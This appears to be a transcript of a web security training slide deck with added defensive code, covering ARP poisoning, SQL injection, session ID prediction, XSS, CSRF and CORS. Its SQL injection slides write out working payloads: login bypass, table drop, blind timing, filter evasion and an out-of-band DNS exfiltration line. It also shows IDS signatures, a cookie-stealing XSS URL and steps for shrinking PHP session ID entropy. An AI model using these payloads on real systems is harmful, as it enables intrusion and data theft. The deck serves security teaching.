Slide 1

Slide 1 text

Let's Abuse / Protect Web [Code best practices to stay safe]
Krishantha Dinesh, MSc, MIEEE, MBCS, Software Architect
www.krishantha.com | www.youtube.com/krish | @krishantha

Slide 2

Slide 2 text

* http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/

Assumptions
• The audience has basic knowledge of networks, software development and SQL
• Examples, if any, are just for learning purposes
• No programming language will be taught
• The audience has a good understanding of the legal side of computer/cyber crimes

Slide 3

Slide 3 text

Mutual agreement
• Since the objective of this session is to teach how to protect web applications/systems from attackers and to protect one's own privacy, any unintended use of this learning is entirely the responsibility of the user.
• The presenter will not be responsible for any damage, loss or legal issues caused by misusing this learning.
• It is assumed that the entire audience, including those who join the session after this slide, is aware of the limitations and legal side of using this learning.

Slide 4

Slide 4 text

What is out-of-the-box?

Slide 5

Slide 5 text

Classic thinking

Slide 6

Slide 6 text

Out-of-the-box thinking
• Use a simple formula

Slide 7

Slide 7 text

Out-of-the-box

Slide 8

Slide 8 text

Hacking???? What is that?
• Hacking is the practice of modifying the features of a system in order to accomplish a goal outside of the creator's original purpose. A person who consistently engages in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker.

Slide 9

Slide 9 text

Will using SSL save me?
• What is SSL
• 2-way SSL

Slide 10

Slide 10 text

What it is
lets talk about web - www.krishantha.com

Slide 11

Slide 11 text

Why SSL cannot protect idiots

Slide 12

Slide 12 text

MITM attack

Slide 13

Slide 13 text

What is a MITM attack?
• One of the most prevalent network attacks used against individuals and large organisations
• MITM works by establishing connections to victim machines and relaying messages between them
• One victim believes it is communicating directly with another victim, when in reality the communication flows through the host performing the attack (just as in the real world)
• The attacking host can not only intercept sensitive data, but can also inject into and manipulate the data stream to gain further control of its victims

Slide 14

Slide 14 text

How can a MITM attack be performed?
• There are many forms of MITM attack:
• ARP poisoning
• DNS spoofing
• HTTP session hijacking
• Port stealing
• ICMP redirection
• SSL hijacking

Slide 15

Slide 15 text

What is ARP?
• The ARP protocol was designed out of necessity to facilitate the translation of addresses between the second and third layers of the OSI model.
• Each layer has its own addressing scheme, and they must work together in order to make network communication happen.
• For this requirement ARP was created in RFC 826, "An Ethernet Address Resolution Protocol".

Slide 16

Slide 16 text

ARP

Slide 17

Slide 17 text

Broadcasting all over

Slide 18

Slide 18 text

One node decides it has the requested address

Slide 19

Slide 19 text

Building the reply

Slide 20

Slide 20 text

Update own cache

Slide 21

Slide 21 text

Unicast reply to requester

Slide 22

Slide 22 text

Update ARP cache

Slide 23

Slide 23 text

How ARP works in one page

Slide 24

Slide 24 text

How ARP works in reality
• ARP operation is centred around two packets, an ARP request and an ARP reply
• The purpose of the request and reply is to locate the hardware (MAC) address associated with a given IP address
• When 10.0.81.85 needs to contact 10.0.81.82 it sends a broadcast message: "who has 10.0.81.82? tell 10.0.81.85"
• 10.0.81.82 responds: "10.0.81.82 is at 1C-3E-84-8D-9C-53"

Slide 25

Slide 25 text

ARP Demo

Slide 26

Slide 26 text

ARP cache

Slide 27

Slide 27 text

How is this compromised?
• ARP cache poisoning takes advantage of the insecure nature of the ARP protocol
• Devices using ARP will accept updates at any time
• This means that any device can send an ARP reply packet to another host and force that host to update its ARP cache with the new value
• Sending an ARP reply when no request has been generated is called sending a gratuitous ARP
• When malicious intent is present, a few well-placed gratuitous ARP packets used in this manner can result in hosts that think they are communicating with one host, but in reality are communicating with a listening attacker

Slide 28

Slide 28 text

Poisoned network

Slide 29

Slide 29 text

How to defend
• arp -a will show you the ARP cache. Check for duplicate entries
• #avoid - use static ARP entries when possible (arp -s)
• #detect - IDS
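Added example (not from the deck): a small Python script that performs the "check for duplicate entries" step over `arp -a` output, the way a host-side check or an IDS rule would. The sample table is constructed, not captured from a real host, and the baseline dictionary is an assumed record of the gateway's known-good MAC (the value you would pin with `arp -s`).

```python
import re
from collections import defaultdict

# Constructed sample of Windows `arp -a` output (not captured from a real host).
# The 10.0.81.x addresses and the 1c-3e-84-8d-9c-53 MAC are the ones used in the
# deck; here that MAC is claimed by two different IPs, which is the kind of
# duplicate entry a poisoned cache shows.
SAMPLE_ARP_A = """\
Interface: 10.0.81.85 --- 0xb
  Internet Address      Physical Address      Type
  10.0.81.1             00-50-56-aa-bb-01     dynamic
  10.0.81.82            1c-3e-84-8d-9c-53     dynamic
  10.0.81.90            1c-3e-84-8d-9c-53     dynamic
  10.0.81.255           ff-ff-ff-ff-ff-ff     static
  224.0.0.22            01-00-5e-00-00-16     static
"""

# One cache entry: IPv4 address, MAC (dash- or colon-separated), entry type.
ENTRY = re.compile(
    r"^\s*(\d{1,3}(?:\.\d{1,3}){3})\s+"
    r"([0-9A-Fa-f]{2}(?:[-:][0-9A-Fa-f]{2}){5})\s+(\w+)"
)


def parse_arp_table(text):
    """Return [(ip, mac, type)] with MACs normalised to lowercase, dash-separated."""
    entries = []
    for line in text.splitlines():
        m = ENTRY.match(line)
        if m:
            ip, mac, kind = m.groups()
            entries.append((ip, mac.lower().replace(":", "-"), kind))
    return entries


def is_group_address(mac):
    """Broadcast and IPv4 multicast entries legitimately share MACs; ignore them."""
    return mac == "ff-ff-ff-ff-ff-ff" or mac.startswith("01-00-5e-")


def find_duplicate_macs(entries):
    """MACs that appear for more than one IP, mapped to the sorted list of IPs.
    One station answering for itself and for another host (typically the
    gateway) is the classic sign of a poisoned cache."""
    by_mac = defaultdict(list)
    for ip, mac, _ in entries:
        if not is_group_address(mac):
            by_mac[mac].append(ip)
    return {mac: sorted(ips) for mac, ips in by_mac.items() if len(ips) > 1}


def changed_from_baseline(entries, baseline):
    """Compare against a recorded known-good mapping (e.g. the gateway's MAC you
    pinned with `arp -s`). Returns {ip: (expected_mac, observed_mac)} for mismatches."""
    observed = {ip: mac for ip, mac, _ in entries}
    return {
        ip: (mac, observed[ip])
        for ip, mac in baseline.items()
        if ip in observed and observed[ip] != mac
    }


if __name__ == "__main__":
    table = parse_arp_table(SAMPLE_ARP_A)
    print("duplicates:", find_duplicate_macs(table))
    # Assumed baseline: what the gateway's MAC was when the network was clean.
    print("changed:", changed_from_baseline(table, {"10.0.81.1": "aa-bb-cc-dd-ee-ff"}))
```

Run it periodically (or feed it the real `arp -a` output) and alert on any non-empty result; a duplicate for the gateway's IP is the case to treat as urgent.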

Slide 30

Slide 30 text

How DNS works
(Figure: client, DNS server, second DNS server, krishantha.com)
• Client: I need to visit the http://krishantha.com domain
• DNS server: http://krishantha.com is not in my cache. Let me check another DNS server
• Second DNS server: Yep.. I have it. http://krishantha.com is mapped to 69.65.3.251

Slide 31

Slide 31 text

DNS spoofing

Slide 32

Slide 32 text

SQL Injection

Slide 33

Slide 33 text

What is SQL Injection???
• SQL injection is one of the many web attack mechanisms used by hackers to steal data from organisations. It is perhaps one of the most common application-layer attack techniques used today. It is a type of attack that takes advantage of improper coding of your web applications, allowing a hacker to inject SQL commands into, say, a login form in order to gain access to the data held within your database.
• In essence, SQL injection arises because the fields available for user input allow SQL statements to pass through and query the database directly.

Slide 34

Slide 34 text

How it works
• Let's say we have an app, and on the login screen we check whether the user exists using the following query:
    SELECT * FROM tblUsers WHERE Name = $name AND Password = $password;
• This means that if the user entered the correct user name and password it will return data. Then we know the user name and password are correct, and login is allowed:
    SELECT * FROM tblUsers WHERE Name = 'Krish' AND Password = 'mypass';

Slide 35

Slide 35 text

Make the database confused…
• We just need to think about how to manipulate the condition part of the query
• Go back to basics: how do the AND / OR operators work?
• Use that
• Enter "1 or 1=1 ;--" as the login name. Then the query looks like:
    SELECT * FROM tblUsers WHERE Name = 1 or 1=1;-- AND Password = $password;
• Since 1=1 is true and the rest is ignored because of the comment, the database will return everything

Slide 36

Slide 36 text

It's more dangerous…
• What if someone sends this?
    SELECT * FROM tblUsers WHERE Name = ''; drop table tblUsers; -- AND Password = $password;
• There are two queries.
• The first one will do nothing…
• The second one will drop the table…

Slide 37

Slide 37 text

How can we defend against this?
• The usual answer is to use prepared statements.
    SELECT * FROM `users` WHERE `username` = ?
• This tells the database about the template (the placeholder is a bare ?; a quoted '?' would be a literal string, not a placeholder). Now the database knows only one value is allowed there.
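Added example (not the deck's code): the vulnerable login from the previous slides beside the prepared-statement version, run against a constructed in-memory SQLite table standing in for tblUsers. The payload is the deck's "1 or 1=1 ;--" adapted to a quoted field; the table contents and user names are made up.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the deck's tblUsers. Passwords are kept
    in clear only to keep the demo short; a real app stores a salted hash."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tblUsers (Name TEXT, Password TEXT)")
    conn.executemany("INSERT INTO tblUsers VALUES (?, ?)",
                     [("Krish", "mypass"), ("alice", "s3cret")])
    return conn


def login_vulnerable(conn, name, password):
    """The deck's pattern: user input pasted straight into the SQL text, so the
    input can change the shape of the WHERE clause."""
    sql = ("SELECT * FROM tblUsers WHERE Name = '%s' AND Password = '%s'"
           % (name, password))
    return conn.execute(sql).fetchall()


def login_prepared(conn, name, password):
    """Prepared statement: the SQL text is fixed and the driver binds the values
    separately, so the input can only ever be compared as a Name string.
    The placeholder is a bare ?; writing '?' would compare against the literal "?"."""
    sql = "SELECT * FROM tblUsers WHERE Name = ? AND Password = ?"
    return conn.execute(sql, (name, password)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    payload = "' or 1=1 --"   # the deck's "1 or 1=1 ;--" for a quoted field
    print(login_vulnerable(conn, "Krish", "mypass"))    # the genuine login: 1 row
    print(login_vulnerable(conn, payload, "anything"))  # every row: condition short-circuited
    print(login_prepared(conn, payload, "anything"))    # no rows: payload is just a name
```

Python's sqlite3 refuses more than one statement per execute(), so the stacked "drop table" variant from the previous slide does not reproduce here; drivers for other databases differ, which is why parameter binding, not driver behaviour, is the control to rely on.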

Slide 38

Slide 38 text

Are we safe now?
• The answer is NO.. But why???
• There are several ways to still attack you.
• The attacks fall into 3 categories:
• In-band
• Out-of-band
• Inferential

Slide 39

Slide 39 text

In-band
• Data is extracted using the same medium that was used to inject the SQL code
• This is the most common attack type. It can be error-based or union-based
    http://example.com/login.asp?id=1 or 1=convert(int,(USER))--
• The system will say:
    Syntax error converting nvarchar value '[sa]' to a column of data type int
• Oh… the database just told us the user name the application is using

Slide 40

Slide 40 text

Out-of-band
• In this case the response to the attack comes back a different way.
• Previously the response came right there on the screen. With this type the response comes via a different medium: maybe email or SMS or DNS or another channel.
    declare @k varchar(1024); set @k='master..xp_dirtree ''\\'+user_name()+'krishantha.com\x'''; exec(@k)

Slide 41

Slide 41 text

Inferential
• This is the difficult one to do. If the application returns errors then it is easy to track.
• But what if the application hides its errors? Then you need to build logic to get some response from the server:
    http://example.com/login.asp?id=1;if(select+system_user)+=+'sa'+waitfor+delay+'0:0:15'--
• This means you ask a question and check the behaviour

Slide 42

Slide 42 text

Is your app exposed? Penetration test
• There are several scenarios that can be used to extract data from a system using SQL injection. So in order to make sure your application is secured, you need to test these scenarios against your application:
• Error-based
• String-based
• Integer-based
• Union-based
• Blind attack

Slide 43

Slide 43 text

Error-based testing
    http://example.com/login.asp?id=1 or 1=convert(int,(USER))--
    Syntax error converting nvarchar value '[sa]' to a column of data type int
• Like this you can get:
• USER
• DB_NAME
• @@servername
• @@version

Slide 44

Slide 44 text

Union-based test
    http://example.com/login.asp?id=1 UNION ALL select 1--
• All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists
    http://example.com/login.asp?id=1 UNION ALL select 1,2--
• All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists
    http://example.com/login.asp?id=1 UNION ALL select 1,2,3--
• NO ERROR means ?????

Slide 45

Slide 45 text

Blind attack test
    http://example.com/login.asp?id=1; if(len(USER)=1) WAITFOR DELAY '00:00:15'--
• If the page comes back immediately, you now know the username is not one character long. So increase the number and find the number of characters. Then find what it starts with, and so on…

Slide 46

Slide 46 text

Are filters good for defence?
• Client-side filtering
• It's too bad. Anyone can save the page, modify the script and re-send
• The attacker has full control of his browser. So there is no point putting your security mechanism in the browser
• So is it a good idea for prevention?

Slide 47

Slide 47 text

Control filtering
• As we know, we need to pass something like 'id=2 or 1=1' in order to make the condition part of the SQL query 'true'.
• So how can we avoid the attack using control-based validation?
• Make the field allow only alphanumeric characters???
• So I will send 'id=2 or 1 like 1'
• Is it successful?????

Slide 48

Slide 48 text

Signature-based filtering
    flow:to_server,established; content:"' or 1=1 --";
• Then we use 'id=2 or 1<2'
• Best is to filter out digits after a logical operand, so it will not allow 1=1 or 1<2 or 1 like 1
• Are we safe???
• How about 'id=2 or 2=1+1'
• oOOOOOpppssss…..

Slide 49

Slide 49 text

What do we do???
• How about if we block any math/logic in the conditional part???
• It will catch 2=1+1
• Are we safe now??
• What if I use this??? 'id=2/**/or/**/2/**/=/**/2--'

Slide 50

Slide 50 text

Solution is to block with a regex
    flow:to_server,established; pcre:"/(and|or)1=1(\-\-|\/\*|\#)/";
• Thank god, now I am safe…
• But……….
    id=2 or 6+1+2=8+1%2D%2D

Slide 51

Slide 51 text

Session Hijacking

Slide 52

Slide 52 text

What is this?
• Steal someone's session ID
• Applications use many techniques to maintain sessions
• We are going to analyse a cookie and generate a duplicate

Slide 53

Slide 53 text

Sample model
• Social network site
• Developed using PHP and running with PHP sessions
• Has a chat facility
• Can upload images, status, notes, etc.

Slide 54

Slide 54 text

If we consider PHP
• Very common language for building websites
• PHP Session: the common default session management
• Used by default in most frameworks such as CakePHP and Kohana
• Session passed via URL or …

Slide 55

Slide 55 text

How does the site know you are authorised?

Slide 56

Slide 56 text

What is an HTTP cookie?
• A small piece of data sent from a website and stored in a user's web browser while the user is browsing that website. Every time the user loads the website, the browser sends the cookie back to the server to notify the website of the user's previous activity. Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items in a shopping cart) or to record the user's browsing activity.
• (Wikipedia)

Slide 57

Slide 57 text

Anatomy of a PHP session
• session_start()
• http://gcov.php.net/PHP_5_3/lcov_html/ext/session/session.c.gcov.php
    spprintf(&buf, 0, "%.15s%ld%ld%0.8F",
             remote_addr ? remote_addr : "",    // IP address, 32 bits
             tv.tv_sec,                         // epoch, 32 bits
             (long int)tv.tv_usec,              // microseconds, 32 bits
             php_combined_lcg(TSRMLS_C) * 10);  // random long, 64 bits
• 160 bits in total!!!!

Slide 58

Slide 58 text

160 bits to try out the normal way
• 160 bits = 1,461,501,637,330,900,000,000,000,000,000,000,000,000,000,000,000 possible values
• At 1 million tries per second = 1,461,501,637,330,900,000,000,000,000,000,000,000,000,000 seconds
• At 1 trillion tries per second = 46,343,912,903,694,300,000,000,000,000 YEARS to finish the attack
• forty-six octillion, three hundred forty-three septillion, nine hundred twelve sextillion, nine hundred three quintillion, six hundred ninety-four quadrillion, three hundred trillion YEARS.. LoL

Slide 59

Slide 59 text

Out-of-the-box thinking
• Microseconds are not really 32 bits. There are 1000 x 1000 microseconds in a second, so it is 20 bits (999,999). Now the total comes down to 148 bits
• EPOCH.. How can we get around this….
• Facebook chat??? It says when you are online.. How??
• Ajax calls…
• Use an HTTP monitor like Wireshark and you can see the back-and-forth traffic
• It will tell you the SERVER TIME, so we discover the epoch, which is 32 bits.
• Now 116 bits

Slide 60

Slide 60 text

Out-of-the-box
• When the user is online, send them a message containing a link to your website
• When the user clicks it, read the Apache log
• Hurray….. Now we have
• What?????
• The IP ADDRESS, another 32 bits
• Now we need 84 bits

Slide 61

Slide 61 text

Out-of-the-box
• Random LCG
• LCG means Linear Congruential Generator
• A linear congruential generator (LCG) is an algorithm that yields a sequence of pseudo-randomised numbers calculated with a linear equation. The method represents one of the oldest and best-known pseudorandom number generator algorithms. The theory behind them is easy to understand, and they are easily implemented and fast, especially on computer hardware which can provide modulo arithmetic by storage-bit truncation.

Slide 62

Slide 62 text

Out-of-the-box

Slide 63

Slide 63 text

Out-of-the-box
• According to that, it uses dates
• Yes, we do not know that to the microsecond. But we know
• Year, month, week, date
• So we reduce another 12 bits
• s2 refers to the process ID: 32 bits are allocated but it is only 15 bits long, so we can save another 17 bits
• If you can execute a PHP function you can save the entire 32 bits
• So we save another 44 bits; now we have only 40 bits

Slide 64

Slide 64 text

Out-of-the-box
• Now 40 bits means we can attack within 12 hours
• If we use two processes for the calculation it goes down to 30 minutes

Slide 65

Slide 65 text

How to prevent
• Create your own keys for sessions
• Do not use the process ID or system variables in keys
• When using a date, use some algorithm to convert it into some other date
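Added example, not from the deck: the brute-force arithmetic from the 160-bit slide as a function (it reproduces the deck's year figure), plus a session ID built the way the slide above advises: from the OS CSPRNG, with no IP, epoch or process ID mixed in, and an HMAC tag under an assumed server key so that guessed values are rejected before any session store is consulted. SERVER_KEY is constructed here for the demo.

```python
import hashlib
import hmac
import secrets

SECONDS_PER_YEAR = 365 * 24 * 60 * 60


def brute_force_years(bits, guesses_per_second):
    """Years to enumerate every value of a bits-wide ID at the given guess rate.
    brute_force_years(160, 1e12) gives the deck's ~4.63e28-year figure."""
    return 2 ** bits / guesses_per_second / SECONDS_PER_YEAR


# Assumed server-side secret (constructed here; in production load it from a
# secrets manager and never derive it from the clock, the pid or a client address).
SERVER_KEY = secrets.token_bytes(32)


def issue_session_id(key=SERVER_KEY, nbytes=16):
    """Build an ID from 128 bits of OS CSPRNG output plus a 128-bit HMAC tag.
    No IP, epoch, pid or LCG value is mixed in, so nothing an observer learns
    from traffic or web-server logs narrows the search the deck describes."""
    rnd = secrets.token_bytes(nbytes)
    tag = hmac.new(key, rnd, hashlib.sha256).digest()[:nbytes]
    return (rnd + tag).hex()


def verify_session_id(sid, key=SERVER_KEY, nbytes=16):
    """Reject malformed, guessed or tampered IDs before the session store is
    touched. compare_digest keeps the tag check constant-time."""
    try:
        raw = bytes.fromhex(sid)
    except ValueError:
        return False
    if len(raw) != 2 * nbytes:
        return False
    rnd, tag = raw[:nbytes], raw[nbytes:]
    expected = hmac.new(key, rnd, hashlib.sha256).digest()[:nbytes]
    return hmac.compare_digest(tag, expected)


if __name__ == "__main__":
    print("%.3e years at 1e12 guesses/s" % brute_force_years(160, 1e12))
    sid = issue_session_id()
    print(sid, verify_session_id(sid), verify_session_id("00" * 32))
```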

Slide 66

Slide 66 text

Cross site scripting (XSS)

Slide 67

Slide 67 text

Why this happens
• <script> tags are hidden but executable
• Usually HTML does not render tags
• If we have <script> inside the HTML it will not be shown to the user
• So if someone adds <script> to the site, visitors will not know that they are exposing something they did not mean to.

Slide 68

Slide 68 text

JS (JavaScript) & History
● Released in 1995 by Netscape
● 1999: David Ross published the paper "Script Injection" [inspired by Georgi Guninski]
● 2005: Samy Kamkar attacked MySpace
● JS is a client-side scripting language, so it can be used to attack the user (client)
● The general aim of the attack is session hijacking or credential stealing
  o e.g. steal a user's cookie & use the web app as them
● Can compromise the entire application through its users

Slide 69

Slide 69 text

What it can do
• stealing other users' cookies / sessions
• stealing others' private information
• performing actions on behalf of others
• redirecting to other websites
• displaying alerts and messages

Slide 70

Slide 70 text

How it works
• The website allows users to send (POST) data to the website
• Hackers use this to post their scripts
• If the website does not validate those inputs, the website will execute them for other users
• When the script gets executed the hacker gets the data they want

Slide 71

Slide 71 text

In action

Slide 72

Slide 72 text

Types of attacks
• Non-persistent
• Persistent
• DOM-based

Slide 73

Slide 73 text

Non-persistent
• When the XSS code only gets displayed on the next page to the same user and does not get saved into persistent storage like a database. These are less dangerous, because they only expose the current user's data to the attacker.

Slide 74

Slide 74 text

CSRF
Cross-site request forgery uses a trusted, authenticated user to execute unwanted actions. As an example, let's say Bob logs in to his bank account and Jack sends him a mail with a link, and that link is the POST request the bank uses to transfer money. When Bob clicks on that link it uses the same session token issued by the bank, and it transfers money!!!!!

Slide 75

Slide 75 text

Persistent XSS
• In the persistent type of XSS attack, the XSS code gets saved into persistent storage like a database along with other data, and then it is visible to other users as well. One example of this kind of attack is possible when users can submit comments: a hacker can add their XSS code along with the comment text, and if no validation or filtering is present on the server, the XSS code is successfully saved into the database.
• After this, if anyone (other users) opens the page in their browser, the XSS code can execute and perform a variety of harmful actions. This type of attack is more dangerous, because the hacker can steal cookies and can make modifications to the page. The risk with these kinds of attacks is that any third-party hacker can use this vulnerability to perform actions on behalf of other users.

Slide 76

Slide 76 text

DOM-based attacks
DOM-based XSS (or type-0 XSS) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM in the victim's browser used by the original client-side script, so that the client-side code runs in an "unexpected" manner.

Slide 77

Slide 77 text

DOM-based attack example
● Expected URL in the HTTP request; the parameter decides the default language to display
  o http://www.some.site/page.html?default=French
● Malicious URL
  o http://www.some.site/page.html?default=alert(document.cookie)

Slide 78

Slide 78 text

Prevention

Slide 79

Slide 79 text

• Don't depend on client-side JS validation
• Do server-side validation. By sanitising the input data we can prevent malicious code from entering the system.
• Blacklists: block <script> tags and event attributes such as onload, onclick, onmouseover, etc.

Slide 80

Slide 80 text

● Recursive sanitisation
  o When processing a client HTTP request or user-supplied data, it must be sanitised
  o Why recursive?
    § Wrapping commonly sanitised characters or sub-strings
    § e.g. <scr<script>ipt> . . . </scr<script>ipt> becomes… <script> . . . </script> after one pass
● Properly handle encoding/decoding
  o URL encoding / percent encoding
    § One method attackers use to bypass literal character filtering is to encode known untrusted/dangerous characters (e.g. %3C = '<')
  o HTML encoding / decoding
    § Another method for bypassing these filters is to HTML-encode the characters injected into the document, to be decoded back into scripts when the page is rendered

Slide 81

Slide 81 text

Follow the escape rules
5 rules for escaping output
#1 - HTML-escape before inserting into element content
#2 - Attribute-escape before inserting into attributes
#3 - JavaScript-escape before inserting into JavaScript data values
#4 - CSS-escape before inserting into style property values
#5 - URL-escape before inserting into URL attributes
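Added example, not the deck's code: the recursive sanitisation and encoding steps from the previous slide and the five escaping rules above, in Python. The wrapped-tag input and the page template are constructed for the demo; the template reuses the deck's ?default= language parameter so one untrusted value lands in every output context.

```python
import html
import json
import re
from urllib.parse import quote, unquote

SCRIPT_TAG = re.compile(r"</?script>", re.IGNORECASE)


def strip_script_once(s):
    """A single blacklist pass: wrapped input leaves a live tag behind."""
    return SCRIPT_TAG.sub("", s)


def strip_script_recursive(s):
    """Repeat the pass until nothing changes (the slide's 'recursive sanitisation')."""
    while True:
        stripped = SCRIPT_TAG.sub("", s)
        if stripped == s:
            return s
        s = stripped


def canonicalise(s):
    """Undo percent- and HTML-encoding to a fixed point before any filter looks at
    the value, so %3C, %253C or &lt; cannot carry a '<' past a literal filter."""
    while True:
        decoded = html.unescape(unquote(s))
        if decoded == s:
            return s
        s = decoded


# The five escaping rules, one function per output context.
def escape_html_content(s):       # rule 1: element content
    return html.escape(s, quote=True)


def escape_html_attribute(s):     # rule 2: attribute value (caller must quote it)
    return html.escape(s, quote=True)


def escape_js_value(s):           # rule 3: JavaScript string value
    # json.dumps yields a quoted JS literal; < and > are hex-escaped on top so the
    # value can never contain "</script>" and close the enclosing block early.
    return json.dumps(s).replace("<", "\\u003c").replace(">", "\\u003e")


def escape_css_value(s):          # rule 4: style property value (strict allowlist)
    return "".join(c if re.match(r"[A-Za-z0-9 #%.,-]", c) else "\\%06x" % ord(c)
                   for c in s)


def escape_url_param(s):          # rule 5: value placed in a URL attribute
    return quote(s, safe="")


def render_language_page(default_lang):
    """Constructed template for the deck's ?default=... page: the same untrusted
    value is inserted in five contexts, each with the matching escape."""
    return (
        '<p>Language: %s</p>\n'
        '<input value="%s">\n'
        '<span style="color: %s">sample</span>\n'
        '<script>var lang = %s;</script>\n'
        '<a href="/page.html?default=%s">reload</a>'
        % (escape_html_content(default_lang),
           escape_html_attribute(default_lang),
           escape_css_value(default_lang),
           escape_js_value(default_lang),
           escape_url_param(default_lang))
    )
```

Stripping and canonicalisation are defence in depth on the input side; the escaping functions are the control that actually stops the deck's DOM example from executing, because they never remove anything and so have no wrapped-input failure mode.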

Slide 82

Slide 82 text

Cross origin resource sharing CORS

Slide 83

Slide 83 text

• Cross-Origin Resource Sharing (CORS) [RFC 6454 – the web origin concept] is a mechanism that uses additional HTTP headers to tell browsers to give a web application running at one origin access to selected resources from a different origin. A web application executes a cross-origin HTTP request when it requests a resource that has a different origin (domain, protocol, or port) from its own.
• For security reasons, browsers restrict cross-origin HTTP requests initiated from scripts.

Slide 84

Slide 84 text

(Figure) Web document, domain: codelabs.lk
• GET image1.png from webserver codelabs.lk
• GET image2.png from webserver cosmos.codelabs.lk: this is handled by CORS

Slide 85

Slide 85 text

Why we need to think about CORS
• The web pages we visit make frequent requests to load assets like images, fonts, and more from many different places across the Internet. If these requests for assets go unchecked, the security of the browser may be at risk. For example, our browser may be subject to hijacking, or our browser might blindly download malicious code. As a result, many modern browsers follow security policies to mitigate such risks.

Slide 86

Slide 86 text

Same-origin policy
• The same-origin policy is very restrictive. Under this policy, a web page hosted on server X can only interact with other documents that are also on server X. In short, the same-origin policy enforces that documents that interact with each other have the same origin.
• An origin is made up of the protocol, host, and port number.
• From http://codelabs.lk/index.html:
• http://codelabs.lk/products.html is ALLOWED by the same-origin policy as the origin is the same (http + codelabs.lk + 80)
• http://cosmos.codelabs.lk/features.html is NOT ALLOWED as the hostname is different.

Slide 87

Slide 87 text

Why is CORS necessary?
• Mainly because having no policy is very vulnerable and the same-origin policy is too restrictive.
• It allows servers to specify not just who can access their assets, but also how the assets can be accessed.
• Cross-origin requests are made using the standard HTTP request methods. Most servers will allow GET requests, meaning they will allow resources from external origins (say, a web page) to read their assets. HTTP request methods like PATCH, PUT, or DELETE, however, may be denied to prevent malicious behaviour. For many servers, this is intentional. For example, it is likely that server A does not want servers B, C, or D to edit or delete its assets.
• With CORS, a server can specify who can access its assets and which HTTP request methods are allowed from external resources.

Slide 88

Slide 88 text

How it imposes security
• It allows servers to specify not just who can access their assets, but also how the assets can be accessed.
• As an example, the codelabs.lk server can configure the cosmos.codelabs.lk origin to GET resources from codelabs.lk but not to POST, PUT or DELETE

Slide 89

Slide 89 text

Cross-origin policy
• Unlike "simple" requests, "pre-flighted" requests first send an HTTP request with the OPTIONS method to the resource on the other domain, to determine whether the actual request is safe to send. Cross-site requests are pre-flighted like this since they may have implications for user data.
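Added example, not the deck's code: the origin comparison from the same-origin slide and a pre-flight (OPTIONS) handler that enforces the policy from the "How it imposes security" slide, where cosmos.codelabs.lk may only GET from codelabs.lk. The policy table and the request-header dictionaries are constructed; a real server would read the headers from the incoming request.

```python
from urllib.parse import urlsplit

DEFAULT_PORTS = {"http": 80, "https": 443}


def origin_of(url):
    """Origin per RFC 6454: (scheme, host, port), default port filled in, so
    http://codelabs.lk and http://codelabs.lk:80 compare equal."""
    p = urlsplit(url)
    scheme = p.scheme.lower()
    return (scheme, (p.hostname or "").lower(), p.port or DEFAULT_PORTS.get(scheme))


def same_origin(url_a, url_b):
    """The same-origin policy check the deck illustrates with the codelabs.lk URLs."""
    return origin_of(url_a) == origin_of(url_b)


# Constructed policy for a server at codelabs.lk, matching the deck's example:
# cosmos.codelabs.lk may GET its resources but not POST, PUT or DELETE.
CORS_POLICY = {
    ("http", "cosmos.codelabs.lk", 80): {"GET"},
}


def cors_headers(origin, method):
    """CORS response headers for an allowed origin/method pair, or None when the
    pair is not allowed (no Access-Control-Allow-Origin is sent, so the browser
    refuses to hand the response, or to issue the actual request, to the script)."""
    allowed = CORS_POLICY.get(origin_of(origin))
    if not allowed or method.upper() not in allowed:
        return None
    return {
        # Echo the one origin that matched; '*' would open the resource to everyone.
        "Access-Control-Allow-Origin": origin,
        "Access-Control-Allow-Methods": ", ".join(sorted(allowed)),
        # Stop a shared cache from serving this answer to a different origin.
        "Vary": "Origin",
    }


def preflight_response(request_headers):
    """Handle the pre-flight OPTIONS request the slide describes: the browser names
    the origin and the method it intends to use, and the server answers for both."""
    origin = request_headers.get("Origin")
    method = request_headers.get("Access-Control-Request-Method", "")
    if not origin or not method:
        return None
    return cors_headers(origin, method)


if __name__ == "__main__":
    print(same_origin("http://codelabs.lk/index.html", "http://cosmos.codelabs.lk/features.html"))
    print(preflight_response({"Origin": "http://cosmos.codelabs.lk",
                              "Access-Control-Request-Method": "GET"}))
    print(preflight_response({"Origin": "http://cosmos.codelabs.lk",
                              "Access-Control-Request-Method": "DELETE"}))
```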

Slide 90

Slide 90 text

Simple vs CORS

Slide 91

Slide 91 text

Q & A, if any